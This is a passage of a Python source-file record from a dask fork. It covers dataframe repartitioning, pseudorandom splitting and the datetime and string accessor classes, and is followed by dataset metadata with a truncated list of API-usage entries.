token\n len_dsk = dict(((name2, i), (len, key)) for i, key in enumerate(df._keys()))\n\n name3 = 'quantiles-3-' + token\n merge_dsk = {(name3, 0): (merge_type, (merge_percentiles, qs, [qs] * df.npartitions,\n sorted(val_dsk), sorted(len_dsk)))}\n dsk = merge(df.dask, val_dsk, len_dsk, merge_dsk)\n return return_type(dsk, name3, df.name, new_divisions)\n\n\ndef pd_split(df, p, seed=0):\n \"\"\" Split DataFrame into multiple pieces pseudorandomly\n\n >>> df = pd.DataFrame({'a': [1, 2, 3, 4, 5, 6],\n ... 'b': [2, 3, 4, 5, 6, 7]})\n\n >>> a, b = pd_split(df, [0.5, 0.5], seed=123) # roughly 50/50 split\n >>> a\n a b\n 1 2 3\n 2 3 4\n 5 6 7\n\n >>> b\n a b\n 0 1 2\n 3 4 5\n 4 5 6\n \"\"\"\n p = list(p)\n index = pseudorandom(len(df), p, seed)\n return [df.iloc[index == i] for i in range(len(p))]\n\n\ndef repartition_divisions(a, b, name, out1, out2, force=False):\n \"\"\" dask graph to repartition dataframe by new divisions\n\n Parameters\n ----------\n a: tuple\n old divisions\n b: tuple, list\n new divisions\n name: str\n name of old dataframe\n out1: str\n name of temporary splits\n out2: str\n name of new dataframe\n force: bool, default False\n Allows the expansion of the existing divisions.\n If False then the new divisions lower and upper bounds must be\n the same as the old divisions.\n\n >>> repartition_divisions([1, 3, 7], [1, 4, 6, 7], 'a', 'b', 'c') # doctest: +SKIP\n {('b', 0): (, ('a', 0), 1, 3, False),\n ('b', 1): (, ('a', 1), 3, 4, False),\n ('b', 2): (, ('a', 1), 4, 6, False),\n ('b', 3): (, ('a', 1), 6, 7, False)\n ('c', 0): (,\n (, [('b', 0), ('b', 1)])),\n ('c', 1): ('b', 2),\n ('c', 2): ('b', 3)}\n \"\"\"\n\n if not isinstance(b, (list, tuple)):\n raise ValueError('New division must be list or tuple')\n b = list(b)\n\n if len(b) < 2:\n # minimum division is 2 elements, like [0, 0]\n raise ValueError('New division must be longer than 2 elements')\n\n if b != sorted(b):\n raise ValueError('New division must be sorted')\n if len(b[:-1]) != len(list(unique(b[:-1]))):\n msg = 'New division must be unique, except for the last element'\n raise ValueError(msg)\n\n if force:\n if a[0] < b[0]:\n msg = ('left side of the new division must be equal or smaller '\n 'than old division')\n raise ValueError(msg)\n if a[-1] > b[-1]:\n msg = ('right side of the new division must be equal or larger '\n 'than old division')\n raise ValueError(msg)\n else:\n if a[0] != b[0]:\n msg = 'left side of old and new divisions are different'\n raise ValueError(msg)\n if a[-1] != b[-1]:\n msg = 'right side of old and new divisions are different'\n raise ValueError(msg)\n\n def _is_single_last_div(x):\n \"\"\"Whether last division only contains single label\"\"\"\n return len(x) >= 2 and x[-1] == x[-2]\n\n c = [a[0]]\n d = dict()\n low = a[0]\n\n i, j = 1, 1 # indices for old/new divisions\n k = 0 # index for temp divisions\n\n last_elem = _is_single_last_div(a)\n\n # process through old division\n # left part of new division can be processed in this loop\n while (i < len(a) and j < len(b)):\n if a[i] < b[j]:\n # tuple is something like:\n # (_loc, ('from_pandas-#', 0), 3, 4, False))\n d[(out1, k)] = (_loc, (name, i - 1), low, a[i], False)\n low = a[i]\n i += 1\n elif a[i] > b[j]:\n d[(out1, k)] = (_loc, (name, i - 1), low, b[j], False)\n low = b[j]\n j += 1\n else:\n d[(out1, k)] = (_loc, (name, i - 1), low, b[j], False)\n low = b[j]\n i += 1\n j += 1\n c.append(low)\n k += 1\n\n # right part of new division can remain\n if a[-1] < b[-1]:\n for _j in range(j, len(b)):\n # always use right-most of old division\n # because it may contain last element\n m = len(a) - 2\n d[(out1, k)] = (_loc, (name, m), low, b[_j], False)\n low = b[_j]\n c.append(low)\n k += 1\n else:\n # even if new division is processed through,\n # right-most element of old division can remain\n if last_elem and i < len(a):\n d[(out1, k)] = (_loc, (name, i - 1), a[i], a[i], False)\n k += 1\n c.append(a[-1])\n\n # replace last element of tuple with True\n d[(out1, k - 1)] = d[(out1, k - 1)][:-1] + (True,)\n\n i, j = 0, 1\n\n last_elem = _is_single_last_div(c)\n\n while j < len(b):\n tmp = []\n while c[i] < b[j]:\n tmp.append((out1, i))\n i += 1\n if last_elem and c[i] == b[-1] and i < k:\n # append if last split is not included\n tmp.append((out1, i))\n i += 1\n if len(tmp) == 0:\n # dumy slice to return empty DataFrame or Series,\n # which retain original data attributes (columns / name)\n d[(out2, j - 1)] = (_loc, (name, 0), a[0], a[0], False)\n elif len(tmp) == 1:\n d[(out2, j - 1)] = tmp[0]\n else:\n if not tmp:\n raise ValueError('check for duplicate partitions\\nold:\\n%s\\n\\n'\n 'new:\\n%s\\n\\ncombined:\\n%s'\n % (pformat(a), pformat(b), pformat(c)))\n d[(out2, j - 1)] = (pd.concat, (list, tmp))\n j += 1\n return d\n\n\ndef repartition(df, divisions, force=False):\n \"\"\" Repartition dataframe along new divisions\n\n Dask.DataFrame objects are partitioned along their index. Often when\n multiple dataframes interact we need to align these partitionings. The\n ``repartition`` function constructs a new DataFrame object holding the same\n data but partitioned on different values. It does this by performing a\n sequence of ``loc`` and ``concat`` calls to split and merge the previous\n generation of partitions.\n\n Parameters\n ----------\n\n divisions: list\n List of partitions to be used\n force: bool, default False\n Allows the expansion of the existing divisions.\n If False then the new divisions lower and upper bounds must be\n the same as the old divisions.\n\n >>> df = df.repartition([0, 5, 10, 20]) # doctest: +SKIP\n\n Also works on Pandas objects\n\n >>> ddf = dd.repartition(df, [0, 5, 10, 20]) # doctest: +SKIP\n \"\"\"\n token = tokenize(df, divisions)\n if isinstance(df, _Frame):\n tmp = 'repartition-split-' + token\n out = 'repartition-merge-' + token\n dsk = repartition_divisions(df.divisions, divisions,\n df._name, tmp, out, force=force)\n return df._constructor(merge(df.dask, dsk), out,\n df.column_info, divisions)\n elif isinstance(df, pd.core.generic.NDFrame):\n name = 'repartition-dataframe-' + token\n dfs = shard_df_on_index(df, divisions[1:-1])\n dsk = dict(((name, i), df) for i, df in enumerate(dfs))\n if isinstance(df, pd.DataFrame):\n return DataFrame(dsk, name, df.columns, divisions)\n if isinstance(df, pd.Series):\n return Series(dsk, name, df.name, divisions)\n raise ValueError('Data must be DataFrame or Series')\n\n\nclass Accessor(object):\n def __init__(self, series):\n if not isinstance(series, Series):\n raise ValueError('Accessor cannot be initialized')\n self._series = series\n\n def _property_map(self, key):\n return map_partitions(self.getattr, self._series.name, self._series, key)\n\n def _function_map(self, key, *args):\n return map_partitions(self.call, self._series.name, self._series, key,\n *args)\n\n def __dir__(self):\n return sorted(set(dir(type(self)) + list(self.__dict__) +\n dir(self.ns)))\n\n def __getattr__(self, key):\n try:\n return object.__getattribute__(self, key)\n except AttributeError:\n if key in dir(self.ns):\n if isinstance(getattr(self.ns, key), property):\n return self._property_map(key)\n else:\n return partial(self._function_map, key)\n else:\n raise\n\nclass DatetimeAccessor(Accessor):\n \"\"\" Accessor object for datetimelike properties of the Series values.\n\n Examples\n --------\n\n >>> s.dt.microsecond # doctest: +SKIP\n \"\"\"\n ns = pd.Series.dt\n\n @staticmethod\n def getattr(obj, attr):\n return getattr(obj.dt, attr)\n\n @staticmethod\n def call(obj, attr, *args):\n return getattr(obj.dt, attr)(*args)\n\n\n\nclass StringAccessor(Accessor):\n \"\"\" Accessor object for string properties of the Series values.\n\n Examples\n --------\n\n >>> s.str.lower() # doctest: +SKIP\n \"\"\"\n ns = pd.Series.str\n\n @staticmethod\n def getattr(obj, attr):\n return getattr(obj.str, attr)\n\n @staticmethod\n def call(obj, attr, *args):\n return getattr(obj.str, attr)(*args)\n", "repo_name": "clarkfitzg/dask", "sub_path": "dask/dataframe/core.py", "file_name": "core.py", "file_ext": "py", "file_size_in_byte": 85367, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "61", "api": [{"api_name": "chest.Chest", "line_number": 21, "usage_type": "name"}, {"api_name": "pandas.computation.expressions.set_use_numexpr", "line_number": 35, "usage_type": "call"}, {"api_name": "pandas.computation", "line_number": 35, "usage_type": "attribute"}, {"api_name": "toolz.first", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 41, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 49, "usage_type": "call"}, {"api_name": "pandas.Index", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 52, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 52, "usage_type": "attribute"}, {"api_name": "optimize.optimize", "line_number": 61, "usage_type": "call"}, {"api_name": "base.Base", "line_number": 68, "usage_type": "name"}, {"api_name": "optimize.optimize", "line_number": 74, "usage_type": "argument"}, {"api_name": "numpy.asarray", "line_number": 89, "usage_type": "call"}, {"api_name": "base.tokenize", "line_number": 101, "usage_type": "call"}, {"api_name": "toolz.merge", "line_number": 103, "usage_type": "call"}, {"api_name": "base.tokenize", "line_number": 112, "usage_type": "call"}, {"api_name": "base.Base", "line_number": 115, "usage_type": "argument"}, {"api_name": "toolz.merge", "line_number": 118, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 128, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 130, "usage_type": "attribute"}, {"api_name": "base.Base", "line_number": 136, "usage_type": "name"}, {"api_name": "optimize.optimize", "line_number": 139, "usage_type": "argument"}, {"api_name": "toolz.merge", "line_number": 170, "usage_type": "call"}, {"api_name": "toolz.merge", "line_number": 183, "usage_type": "call"}, {"api_name": "chest.Chest", "line_number": 189, "usage_type": "name"}, {"api_name": "uuid.uuid1", "line_number": 198, "usage_type": "call"}, {"api_name": "operator.setitem", "line_number": 199, "usage_type": "name"}, {"api_name": "toolz.merge", "line_number": 201, "usage_type": "call"}, {"api_name": "operator.getitem", "line_number": 205, "usage_type": "name"}, {"api_name": "functools.wraps", "line_number": 209, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 209, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 216, "usage_type": "attribute"}, {"api_name": "numpy.random.RandomState", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 253, "usage_type": "attribute"}, {"api_name": "numpy.iinfo", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 253, "usage_type": "attribute"}, {"api_name": "operator.getitem", "line_number": 260, "usage_type": "name"}, {"api_name": "toolz.merge", "line_number": 263, "usage_type": "call"}, {"api_name": "toolz.merge", "line_number": 277, "usage_type": "call"}, {"api_name": "base.compute", "line_number": 280, "usage_type": "name"}, {"api_name": "toolz.merge", "line_number": 293, "usage_type": "call"}, {"api_name": "base.compute", "line_number": 296, "usage_type": "name"}, {"api_name": "toolz.merge", "line_number": 326, "usage_type": "call"}, {"api_name": "toolz.merge", "line_number": 346, "usage_type": "call"}, {"api_name": "toolz.merge", "line_number": 361, "usage_type": "call"}, {"api_name": "utils.IndexCallable", "line_number": 370, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 403, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 403, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 417, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 417, "usage_type": "attribute"}, {"api_name": "numpy.iinfo", "line_number": 417, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 417, "usage_type": "attribute"}, {"api_name": "base.tokenize", "line_number": 419, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 422, "usage_type": "attribute"}, {"api_name": "numpy.random.RandomState", "line_number": 423, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 423, "usage_type": "attribute"}, {"api_name": "numpy.iinfo", "line_number": 424, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 424, "usage_type": "attribute"}, {"api_name": "compatibility.apply", "line_number": 428, "usage_type": "name"}, {"api_name": "toolz.merge", "line_number": 432, "usage_type": "call"}, {"api_name": "io.to_hdf", "line_number": 439, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 435, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 435, "usage_type": "attribute"}, {"api_name": "io.to_csv", "line_number": 445, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 442, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 442, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 469, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 469, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 479, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 479, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 489, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 489, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 499, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 499, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 526, "usage_type": "attribute"}, {"api_name": "base.tokenize", "line_number": 527, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 510, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 510, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 550, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 530, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 530, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 564, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 554, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 554, "usage_type": "attribute"}, {"api_name": "base.tokenize", "line_number": 575, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 581, "usage_type": "attribute"}, {"api_name": "toolz.merge", "line_number": 588, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 592, "usage_type": "attribute"}, {"api_name": "multi._pdconcat", "line_number": 597, "usage_type": "name"}, {"api_name": "pandas.Series", "line_number": 617, "usage_type": "call"}, {"api_name": "toolz.merge", "line_number": 625, "usage_type": "call"}, {"api_name": "operator.add", "line_number": 637, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 628, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 628, "usage_type": "attribute"}, {"api_name": "operator.mul", "line_number": 648, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 639, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 639, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 659, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 659, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 664, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 650, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 650, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 675, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 675, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 680, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 666, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 666, "usage_type": "attribute"}, {"api_name": "base.normalize_token.register", "line_number": 688, "usage_type": "call"}, {"api_name": "base.normalize_token", "line_number": 688, "usage_type": "name"}, {"api_name": "pandas.Series", "line_number": 702, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 752, "usage_type": "attribute"}, {"api_name": "utils.repr_long_list", "line_number": 757, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 760, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 766, "usage_type": "call"}, {"api_name": "array.core", "line_number": 766, "usage_type": "argument"}, {"api_name": "pandas.Series", "line_number": 804, "usage_type": "call"}, {"api_name": "pandas.datetools.Day", "line_number": 814, "usage_type": "call"}, {"api_name": "pandas.datetools", "line_number": 814, "usage_type": "attribute"}, {"api_name": "pandas.datetools.to_offset", "line_number": 816, "usage_type": "call"}, {"api_name": "pandas.datetools", "line_number": 816, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 823, "usage_type": "attribute"}, {"api_name": "operator.getitem", "line_number": 833, "usage_type": "attribute"}, {"api_name": "toolz.merge", "line_number": 836, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 840, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 840, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 857, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 860, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 860, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 864, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 864, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 868, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 868, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 872, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 872, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 876, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 876, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 880, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 880, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 884, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 884, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 888, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 888, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 892, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 892, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 896, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 896, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 900, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 900, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 904, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 904, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 908, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 908, "usage_type": "attribute"}, {"api_name": "distutils.version.LooseVersion", "line_number": 915, "usage_type": "call"}, {"api_name": "pandas.__version__", "line_number": 915, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 912, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 912, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 922, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 922, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 928, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 926, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 926, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 932, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 930, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 930, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 936, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 934, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 934, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 940, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 938, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 938, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 944, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 942, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 942, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 949, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 947, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 947, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 953, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 951, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 951, "usage_type": "attribute"}, {"api_name": "io.to_bag", "line_number": 965, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 970, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 967, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 967, "usage_type": "attribute"}, {"api_name": "compatibility.bind_method", "line_number": 982, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 988, "usage_type": "attribute"}, {"api_name": "pandas.notnull", "line_number": 1009, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 1010, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 1031, "usage_type": "attribute"}, {"api_name": "numpy.isscalar", "line_number": 1058, "usage_type": "call"}, {"api_name": "operator.getitem", "line_number": 1061, "usage_type": "attribute"}, {"api_name": "toolz.merge", "line_number": 1063, "usage_type": "call"}, {"api_name": "operator.getitem", "line_number": 1070, "usage_type": "attribute"}, {"api_name": "toolz.merge", "line_number": 1074, "usage_type": "call"}, {"api_name": "multi._maybe_align_partitions", "line_number": 1081, "usage_type": "call"}, {"api_name": "toolz.merge", "line_number": 1087, "usage_type": "call"}, {"api_name": "utils.repr_long_list", "line_number": 1106, "usage_type": "call"}, {"api_name": "shuffle.set_index", "line_number": 1121, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 1118, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1118, "usage_type": "attribute"}, {"api_name": "shuffle.set_partition", "line_number": 1132, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 1146, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1146, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 1158, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 1153, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1153, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 1167, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1169, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 1163, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1163, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 1185, "usage_type": "attribute"}, {"api_name": "base.tokenize", "line_number": 1188, "usage_type": "call"}, {"api_name": "compatibility.apply", "line_number": 1189, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 1189, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 1193, "usage_type": "attribute"}, {"api_name": "toolz.merge", "line_number": 1196, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 1199, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1199, "usage_type": "attribute"}, {"api_name": "io.to_castra", "line_number": 1215, "usage_type": "call"}, {"api_name": "base.compute", "line_number": 1216, "usage_type": "name"}, {"api_name": "io.to_bag", "line_number": 1228, "usage_type": "call"}, {"api_name": "pandas.util.decorators.cache_readonly", "line_number": 1230, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 1240, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 1236, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1236, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 1271, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1274, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 1266, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1266, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 1281, "usage_type": "attribute"}, {"api_name": "multi.merge", "line_number": 1285, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 1276, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1276, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 1294, "usage_type": "attribute"}, {"api_name": "multi.merge", "line_number": 1298, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 1290, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1290, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 1323, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 1325, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 1329, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1330, "usage_type": "call"}, {"api_name": "compatibility.bind_method", "line_number": 1338, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1360, "usage_type": "attribute"}, {"api_name": "operator.abs", "line_number": 1365, "usage_type": "attribute"}, {"api_name": "operator.add", "line_number": 1365, "usage_type": "attribute"}, {"api_name": "operator.and_", "line_number": 1365, "usage_type": "attribute"}, {"api_name": "compatibility.operator_div", "line_number": 1365, "usage_type": "name"}, {"api_name": "operator.eq", "line_number": 1366, "usage_type": "attribute"}, {"api_name": "operator.gt", "line_number": 1366, "usage_type": "attribute"}, {"api_name": "operator.ge", "line_number": 1366, "usage_type": "attribute"}, {"api_name": "operator.inv", "line_number": 1366, "usage_type": "attribute"}, {"api_name": "operator.lt", "line_number": 1367, "usage_type": "attribute"}, {"api_name": "operator.le", "line_number": 1367, "usage_type": "attribute"}, {"api_name": "operator.mod", "line_number": 1367, "usage_type": "attribute"}, {"api_name": "operator.mul", "line_number": 1367, "usage_type": "attribute"}, {"api_name": "operator.ne", "line_number": 1368, "usage_type": "attribute"}, {"api_name": "operator.neg", "line_number": 1368, "usage_type": "attribute"}, {"api_name": "operator.or_", "line_number": 1368, "usage_type": "attribute"}, {"api_name": "operator.pow", "line_number": 1368, "usage_type": "attribute"}, {"api_name": "operator.sub", "line_number": 1369, "usage_type": "attribute"}, {"api_name": "operator.truediv", "line_number": 1369, "usage_type": "attribute"}, {"api_name": "operator.floordiv", "line_number": 1369, "usage_type": "attribute"}, {"api_name": "operator.xor", "line_number": 1369, "usage_type": "attribute"}, {"api_name": "{'to_hdf': 'io.to_hdf', 'to_csv': 'io.to_csv', '_pdconcat': 'multi._pdconcat'}._bind_operator", "line_number": 1370, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1377, "usage_type": "attribute"}, {"api_name": "{'_maybe_align_partitions': 'multi._maybe_align_partitions', 'set_index': 'shuffle.set_index', 'set_partition': 'shuffle.set_partition', 'to_castra': 'io.to_castra', 'to_bag': 'io.to_bag', 'merge': 'multi.merge'}._bind_operator_method", "line_number": 1378, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 1380, "usage_type": "attribute"}, {"api_name": "{'to_bag': 'io.to_bag'}._bind_operator_method", "line_number": 1381, "usage_type": "call"}, {"api_name": "toolz.partial", "line_number": 1389, "usage_type": "call"}, {"api_name": "toolz.partition", "line_number": 1406, "usage_type": "call"}, {"api_name": "bisect.bisect_right", "line_number": 1426, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1465, "usage_type": "argument"}, {"api_name": "pandas.Timestamp", "line_number": 1466, "usage_type": "call"}, {"api_name": "numpy.datetime64", "line_number": 1467, "usage_type": "attribute"}, {"api_name": "numpy.datetime64", "line_number": 1468, "usage_type": "call"}, {"api_name": "toolz.first", "line_number": 1487, "usage_type": "call"}, {"api_name": "base.tokenize", "line_number": 1497, "usage_type": "call"}, {"api_name": "multi._maybe_align_partitions", "line_number": 1502, "usage_type": "call"}, {"api_name": "array.core.partial_by_order", "line_number": 1512, "usage_type": "call"}, {"api_name": "toolz.merge", "line_number": 1521, "usage_type": "call"}, {"api_name": "{'_maybe_align_partitions': 'multi._maybe_align_partitions', 'set_index': 'shuffle.set_index', 'set_partition': 'shuffle.set_partition', 'to_castra': 'io.to_castra', 'to_bag': 'io.to_bag', 'merge': 'multi.merge'}", "line_number": 1524, "usage_type": "call"}, {"api_name": "{'to_bag': 'io.to_bag'}", "line_number": 1528, "usage_type": "call"}, {"api_name": "base.tokenize", "line_number": 1573, "usage_type": "call"}, {"api_name": "toolz.merge", "line_number": 1583, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 1592, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 1593, "usage_type": "attribute"}, {"api_name": "toolz.merge", "line_number": 1601, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1611, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 1611, "usage_type": "attribute"}, {"api_name": "io.from_pandas", "line_number": 1611, "usage_type": "call"}, {"api_name": "{'_maybe_align_partitions': 'multi._maybe_align_partitions', 'set_index': 'shuffle.set_index', 'set_partition': 'shuffle.set_partition', 'to_castra': 'io.to_castra', 'to_bag': 'io.to_bag', 'merge': 'multi.merge'}._validate_axis", "line_number": 1682, "usage_type": "call"}, {"api_name": "multi.concat_indexed_dataframes", "line_number": 1691, "usage_type": "call"}, {"api_name": "base.tokenize", "line_number": 1696, "usage_type": "call"}, {"api_name": "toolz.merge", "line_number": 1706, "usage_type": "call"}, {"api_name": "multi.concat_indexed_dataframes", "line_number": 1711, "usage_type": "call"}, {"api_name": "base.tokenize", "line_number": 1724, "usage_type": "call"}, {"api_name": "toolz.merge", "line_number": 1730, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 1767, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 1791, "usage_type": "call"}, {"api_name": "pandas.core", "line_number": 1791, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 1795, "usage_type": "call"}, {"api_name": "pandas.core", "line_number": 1795, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 1799, "usage_type": "call"}, 